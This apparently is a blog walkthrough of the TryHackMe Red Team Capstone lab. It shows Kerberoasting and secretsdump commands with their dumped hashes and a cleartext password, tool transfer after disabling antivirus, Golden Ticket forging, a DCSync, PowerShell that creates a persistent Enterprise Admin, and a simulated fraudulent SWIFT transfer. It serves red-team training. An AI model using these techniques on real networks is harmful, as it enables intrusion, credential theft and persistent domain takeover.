GetUserSPNs.py can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password. This attack is named Kerberoast. This script can also be used for Kerberoast without authentication.

We will use a tool called Impacket-GetUserSPNs to grab Kerberos hashes for the users. We get the hashes for the following users.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ proxychains4 impacket-GetUserSPNs corp.thereserve.loc/laura.wood:'Password1@' -dc-ip 10.200.113.102 -request
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.102:389  ...  OK
ServicePrincipalName  Name         MemberOf                                                   PasswordLastSet             LastLogon                   Delegation 
--------------------  -----------  ---------------------------------------------------------  --------------------------  --------------------------  ----------
cifs/scvScanning      svcScanning  CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:07:06.603818  <never>                                
cifs/svcBackups       svcBackups   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:05:59.787089  2023-02-15 03:42:19.327102             
http/svcEDR           svcEDR       CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:21.150738  <never>                                
http/svcMonitor       svcMonitor   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:43.306959  <never>                                
mssql/svcOctober      svcOctober   CN=Internet Access,OU=Groups,DC=corp,DC=thereserve,DC=loc  2023-02-15 03:07:45.563346  2023-03-30 17:26:54.115866 

The output of this will also give us hashes for the above users. We will save the hashes for each user and start cracking them offline.

Hashcat was able to crack only one hash successfully for the service account svcScanning.

Using this account, we can RDP into the Server machines.

Compromising the CORPDC

Service accounts have more privileges than normal domain users. With the svcScanning account, we can carry out further attacks such as dumping secrets from the AD machines.

For this attack, we will make use of Impacket-secretsdump tool. Let’s try to dump hashes on the Server1 machine.

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ proxychains impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.113.31
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.31:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90cf5c2fdcffe9d25ff0ed9b3d14a846
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2c7044e93cf7e4d8697582207d6785c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
THMSetup:1008:aad3b435b51404eeaad3b435b51404ee:d37f688ca5172b5976b714a8b54b40f4:::
HelpDesk:1009:aad3b435b51404eeaad3b435b51404ee:f6ca2f672e731b37150f0c5fa8cfafff:::
sshd:1010:aad3b435b51404eeaad3b435b51404ee:48c62694fd5bbca286168e2199f9af49:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.THERESERVE.LOC/Administrator:$DCC2$10240#Administrator#b08785ec00370a4f7d02ef8bd9b798ca: (2023-04-01 03:13:47)
CORP.THERESERVE.LOC/svcScanning:$DCC2$10240#svcScanning#d53a09b9e4646451ab823c37056a0d6b: (2024-02-06 22:58:50)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
CORP\SERVER1$:aes256-cts-hmac-sha1-96:60db0f5bd8abfee643cae3060ed708e3158426f253e2711f9be068245cee19ac
CORP\SERVER1$:aes128-cts-hmac-sha1-96:3e61a6a2a9f25ada7f7ebd64a3384a9a
CORP\SERVER1$:des-cbc-md5:023dfdfbcd51b6a8
CORP\SERVER1$:plain_password_hex:323da71a677b83100ef8a4555d87c9ed4af979b405f786814bdecc168e16f82b86cf247e0b03bbe01c09b9fa98d5866fe4a09d3fd99a98b4543bdb36fbbe742c05b0e9b4f6795313db4f68c33cc6bc2330a1c4d75311ede155b90f11ebe5ff8409989636083928daf72ecd7f807e47b4eea7741d5ac3c4141ffad6e5663a19a1660a562a0aa72031d25f1229eb4a445016b8a8b7614ed559b78ef9334dcf6dd9442a1ff43d7a3b1a99b4d74906f3b99666a4d277190d06bb76c6905a9fdf03d7a1272903fce0f5c1c7ed7cee1a9332123ffff71fc3d1de00db45845270842b4b33415df5b524e6f0bf1beac6bdf2fb2a
CORP\SERVER1$:aad3b435b51404eeaad3b435b51404ee:ab478e460aa37786571a4d13497c2f47:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb4cfb5032a98c1b279c92264915da1fd3d8b1a0d
dpapi_userkey:0x3cddfc2ba786e51edf1c732a21ffa1f3d19aa382
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] _SC_SYNC 
svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

There are a couple of things from this output that are of most interest to us:

  • The Administrator’s NTLM hash
  • The ClearText password for svcBackups account

Performing the same technqiue won’t work on CORPDC machine with the svcScanning account.

To perform the same technique and dump secrets from the CORPDC machine, we will use the svcBackups account.

This worked out perfectly fine for us and we now have the NTLM hash for the Administrator user for the CORPDC machine! This is a big achievement. Having the Administrator’s hash, we can connect to the CORPDC machine via RDP or using Winrm. We can also try to crack the hash offline and find out the password for the Administrator.

When trying to RDP we get a message that the account is not allowed to log in without a password or with a blank password.

We will need a password for the administrator to connect via RDP. Hashcat was not able to crack the hash. Our next option is to connect using evil-winrm.

To get RDP access, we can create a new user as an Administrator.

Changing the Administrator password is not recommend as this will not be a preferable option in real world pentest assignments.

First, let’s create a user.

Next, we will enumerate the groups to find the group name for the Administrator user.

Finally, we will add our user to this group to make him the Domain Admin.

We can now connect to RDP and submit the proof of compromises. Our network expands further revealing another domain on the network.

Compromising the ROOTDC

Looking at the network topology, we can see that the AD Forest contains two child domains–CORPDC and BANKDC–and a parent DC–ROOTDC. Our shortest path to compromise the entire forest would be to compromise the ROOTDC first. This will give us access to the other machines on the network.

We can begin our enumeration by finding out the Domain-Trust Relationship between the CORPDC and ROOTDC. To enumerate the Domains, we will use PowerView. PowerView is a PowerShell module using which we can run different commands to enumerate the domain.

But first, we will need to get the PowerView script onto the CORPDC machine. To make the file transfer, we will perform the following steps:

  • Host the PowerView.ps1 file on our Kali machine
  • Get the file onto the VPN machine
  • Host the file using a Python web server on the VPN machine
  • Download the file to the CORPDC machine

On our Kali (Attack) Machine:

┌──(ishsome㉿kali)-[~/THM/RedTeam-Capstone]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On VPN machine:

root@ip-10-200-113-12:/var/www/html# cd /tmp
root@ip-10-200-113-12:/tmp# wget http://10.50.110.229/PowerView.ps1
--2024-02-07 15:15:26--  http://10.50.110.229/PowerView.ps1
Connecting to 10.50.110.229:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [application/octet-stream]
Saving to: ‘PowerView.ps1’

PowerView.ps1       100%[===================>] 752.23K   238KB/s    in 3.2s    

2024-02-07 15:15:30 (238 KB/s) - ‘PowerView.ps1’ saved [770279/770279]

root@ip-10-200-113-12:/tmp# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On CORPDC:

Before trying to get the file on CORPDC, we will need to turn OFF Virus Protection, and also allow our VPN server IP to download files in the browser settings.

We can download the file now and start enumerating the domains.

We can see that there is a Bideirectional Domain trust between the two domains.

Bidirectional domain trusts allow two Active Directory domains to trust each other, meaning users and resources from one domain can access resources in the other domain, and vice versa. Here are some common ways attackers abuse bidirectional domain trusts:

  1. Pass-the-Ticket (PtT) Attacks: With access to one domain, attackers can use PtT attacks to obtain Ticket Granting Tickets (TGTs) for users in the trusted domain. These TGTs can then be used to authenticate to resources in the trusted domain, allowing the attacker to move laterally.
  2. Pass-the-Hash (PtH) Attacks: Similar to PtT attacks, PtH attacks involve stealing password hashes of privileged accounts in one domain and using them to authenticate to resources in the trusted domain. This allows attackers to move laterally without needing to know the plaintext passwords.
  3. Golden Ticket Attacks: Attackers can forge Kerberos tickets, known as Golden Tickets, using the KRBTGT account’s password hash from one domain and the trust relationship between the domains. With a Golden Ticket, attackers gain unrestricted access to any resource in the trusted domain.
  4. Silver Ticket Attacks: Silver Ticket attacks involve forging Service Principal Name (SPN) tickets to impersonate specific services in the trusted domain. This allows attackers to access resources associated with those SPNs without needing the service account’s credentials.
  5. Abusing AdminSDHolder: If the domains have differing security postures or if the trust is not properly configured, attackers may abuse AdminSDHolder, a mechanism in Active Directory that enforces permissions on sensitive accounts like Domain Admins. By escalating privileges or modifying permissions through AdminSDHolder, attackers can gain unauthorized access to critical accounts and resources in the trusted domain.
  6. Exploiting Misconfigurations: Attackers may look for misconfigurations in the trust relationship, such as weak authentication settings or improper trust permissions. Exploiting these misconfigurations can provide avenues for unauthorized access and lateral movement.

We can go for the Golden Ticket attack and try to impersonate a user (Administrator) with high privileges on the ROOTDC.

Golden Ticket Attack

A Golden Ticket attack is a sophisticated form of cyber attack that involves forging Kerberos tickets to gain unauthorized access to a Windows Active Directory environment. In Kerberos authentication, tickets are used to prove the identity of users and services within the domain. The Ticket Granting Ticket (TGT) is a crucial component in this process, as it grants access to various resources across the domain.

In a Golden Ticket attack, the attacker gains access to the KRBTGT account’s password hash, which is a privileged account used by the Key Distribution Center (KDC) to encrypt TGTs. With the KRBTGT password hash, the attacker can create a forged TGT that grants them unrestricted access to any resource in the Active Directory domain.

The key steps involved in a Golden Ticket attack include:

  1. Obtaining KRBTGT Password Hash: Attackers typically gain access to the KRBTGT password hash through various means, such as compromising a domain controller, using Mimikatz to extract the hash from memory, or exploiting vulnerabilities.
  2. Forging the TGT: Using the KRBTGT password hash, the attacker generates a forged TGT with arbitrary user credentials, group memberships, and privileges. The attacker can set the ticket’s lifetime to a long duration, allowing prolonged access to the domain.
  3. Injecting the TGT: The forged TGT is then injected into the attacker’s session, effectively impersonating a legitimate user with elevated privileges within the domain.
  4. Accessing Resources: With the Golden Ticket in hand, the attacker can access any resource within the domain, including sensitive data, systems, and services. Since the forged TGT contains arbitrary user credentials, the attacker can bypass authentication checks and perform actions as if they were a legitimate user with full domain privileges.

So to carry out this attack we will need:

  • The KRBTGT password hash
  • The Security Identifier (SID) of the (CORPDC) Domain
  • The user account we want to impersonate (Administrator)

To make our attack more advanced, we can also inject the SID for the Enterprise Admins group so that the user we impersonate would have high privileges. This will give us access to all the machines in the entire Forest if we are successful in doing so.

Let’s get the SIDs for the CORPDC and the Enterprise Admins group.

To get the KRBTGT hash and also to forge the Golden Ticket, we will need mimikatz.exe. We will transfer the mimikatz binary the same way we got the PowerView on the CORPDC machine.

Let’s get the KRBTGT hash first.

We now have all the information we need to forge the Golden Ticket which will be injected in our current session.

The output indicates that we have successfully impersonated the user. We can quickly test if our attack worked by trying to list out the shares on the ROOTDC machine.

Great! It worked! We can also get a shell on the ROOTDC using PsExec.exe.

We can submit the proof of compromise and get the flag for the ROOTDC machine.

For persistence, we can create a new user and add it to the Enterprise Admin group so that we will have elevated privileges on all the domains. We can either use the below PowerShell commands or use GUI on CORPDC.

$pwd = convertTo-SecureString Capstone1@ -AsPlainText -Force

New-ADUser -Name ishsomeroot -AccountPassword $pwd

$User = Get-ADUser -Identity ishsome  -Server "corpdc.corp.thereserve.loc"

$Group = Get-ADGroup -Identity "Enterprise Admins" -Server "rootdc.thereserve.loc"

Add-ADGroupMember -Identity $Group -Members $User -Server "rootdc.thereserve.loc"
  • We will create a user called ishsome
  • Add this user to the Enterprise Admins and Remote Desktop Users group
  • Use RDP to connect to all other machines on the network

Compromising BANKDC

We should be able to connect to BANKDC now and submit the proof of compromise.

At this point, we have compromised all three domains. We have the highest privileges in the domain and we own all the Domain Controllers, users, and computers for the entire AD Forest. This is a huge achievement for a Red Teamer.

The goal of this challenge is to show the impact of the compromise. Our final goal is to make a fraudulent transaction and compromise the SWIFT banking system.

Compromising SWIFT Banking System

Accessing the application from the JMP machine shows us the following web page.

To get instructions on how to proceed, we can go to the e-citizen platform and select option 17 as supposed to we are submitting the proof of compromise. We get the below instructions.

In order to proof that you have access to the SWIFT system, dummy accounts have been created for you and you will have to perform the following steps to prove access.
===============================================
Account Details:
Source Email:		ishsome36@source.loc
Source Password:	T9nscPQYAnD-Jw
Source AccountID:	65c82460599a22214d185b31
Source Funds:		$ 10 000 000

Destination Email:	ishsome36@destination.loc
Destination Password:	pKLuBT5vhbh7-w
Destination AccountID:	65c82463599a22214d185b32
Destination Funds:	$ 10
===============================================

Using these details, perform the following steps:
1. Go to the SWIFT web application
2. Navigate to the Make a Transaction page
3. Issue a transfer using the Source account as Sender and the Destination account as Receiver. You will have to use the corresponding account IDs.
4. Issue the transfer for the full 10 million dollars
5. Once completed, request verification of your transaction here (No need to check your email once the transfer has been created).

We can log in with the credentials provided to us and make the transaction.

We received a PIN in our email and using it we can confirm that our transaction was initiated.

We get further instructions in our email which states that we need to compromise a capturer’s and an approver’s account, log in with their accounts respectively, and complete the transaction. So to break it down further:

  • We need a user account from Capturers group
  • We need to log in with this account and capture the transaction
  • We also need to get a user account from Approvers group
  • We then need to log in as approver and complete the transaction to achieve the goal

Let’s connect to BANKDC via RDP and enumerate the user groups.

We notice that there are two groups that we are interested in. We can check out the users in each group. We don’t need to compromise all the accounts–just one account from each group to complete the task.

We can use mimikatz and perform dcsync attack to dump NTLM hashes for these users from both groups. We had the file on the ROOTDC machine.

We can download mimikatz from the ROOTDC machine to BANKDC.

We can grab the hashes for each user now.

We tried cracking the hash offline and we were successful.

We noticed that the hash for c.young and a.holt users was same. Both users have the same password. This could be intentional or other users working on the lab at tha same lab–since this is a shared environment–might have changes the passwords for the users. Changing the passwords for the users seems easy but it is not recommended.

We can log in as c.young and forward our transaction.

Next, we need to log in as a.holt user and approve the transaction. But for some reason, the credentials won’t work. We will connect to the JMP machine via RDP and use a.holt’s AD credentials. After logging in we can see there is a note that clarifies why AD credentials did not work for a.holt on the bank login page.

The approvers account credentials are not same as their AD account.

Upon further enumerating, we notice that when trying to log in to the bank application using Google Chrome, the username and password fields get auto-filled! On checking the Settings in the browser, we see that credentials are saved for the site! We can log in now and approve the transaction.

Approving the transaction confirms that we have successfully achieved the goal for this challenge! Not only we have compromised the entire AD Forest with three Domain Controllers but also made a fraudulent transaction to show the further impact of the compromise.

Conclusion

Phew! This has been a wild ride. This was the best Red Teaming lab I’ve worked on so far. Thanks to TryHackMe for this opportunity to practice our red teaming skills. Apart from some frustrating moments–mostly due to other users changing/deleting the accounts and passwords, I have thoroughly enjoyed working on this assignment.

In this blog, I have only included the direct path with the least number of steps needed to complete the challenge. There are other attack vectors and may be an even easier way to complete the task. Feel free to ask any questions or if you need any help regarding this lab.